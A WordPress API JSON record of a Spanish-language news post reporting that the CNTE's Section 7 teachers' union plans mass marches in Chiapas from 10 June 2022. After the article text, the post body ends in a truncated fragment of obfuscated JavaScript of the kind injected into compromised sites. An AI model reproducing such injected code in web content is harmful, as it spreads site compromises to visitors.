{"id":2326,"date":"2022-05-24T23:52:18","date_gmt":"2022-05-24T23:52:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2326"},"modified":"2022-05-24T23:52:21","modified_gmt":"2022-05-24T23:52:21","slug":"amaga-la-cnte-con-mas-movilizaciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2326","title":{"rendered":"Amaga la CNTE con m\u00e1s movilizaciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"600\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220524-WA0022.jpg\" alt=\"\" class=\"wp-image-2327\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220524-WA0022.jpg 800w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220524-WA0022-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/05\/IMG-20220524-WA0022-768x576.jpg 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<br>Agencia ReporteCiudadano, 24 de mayo del 2022. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Luis Escobar P\u00e9rez, integrante de la Comisi\u00f3n Ejecutiva de la Secci\u00f3n 7 de la CNTE dio a conocer que, para el 10 de junio iniciar\u00e1n una intensa jornada de movilizaciones en Chiapas y el centro del pa\u00eds.<br>El 10 de junio, fecha en que, arrancar\u00e1n con una marcha multitudinaria en Tuxtla Guti\u00e9rrez y podr\u00edan desplazarse al centro del pa\u00eds para exigir a la Cuarta Transformaci\u00f3n la instalaci\u00f3n del di\u00e1logo del presidente con la Mesa \u00danica de Negociaci\u00f3n en Palacio Nacional.<br>Jos\u00e9 Luis Escobar P\u00e9rez, expuso que actualmente realizan asambleas masivas en las 24 regiones del estado, para consultar con las beses diversos puntos, entre ellos, las acciones a realizarse en el marco de la renovaci\u00f3n de la dirigencia estatal sin intervenci\u00f3n de las autoridades estatales.<br>Tambi\u00e9n consultan con las bases magisteriales si est\u00e1n dispuestos a iniciar los tr\u00e1mites para echar a andar la caja de ahorro Fabes bajo sus principios sindicales, sin intervenci\u00f3n gubernamental.<br>En este sentido coment\u00f3 que: \u201cCon el \u00fanico prop\u00f3sito de reorganizarnos en la lucha, y as\u00ed poder informar para consultar a las bases de la necesidad de volver nuevamente a las calles\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores.Agencia ReporteCiudadano, 24 de mayo del 2022. Tuxtla Guti\u00e9rrez.- Jos\u00e9 Luis Escobar P\u00e9rez, integrante de la Comisi\u00f3n Ejecutiva de la Secci\u00f3n 7 de la CNTE dio a conocer que, para el 10 de junio iniciar\u00e1n una intensa jornada de movilizaciones en Chiapas y el centro del pa\u00eds.El 10 de junio, fecha en que, arrancar\u00e1n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2326","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2326"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2326\/revisions"}],"predecessor-version":[{"id":2328,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2326\/revisions\/2328"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2327"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}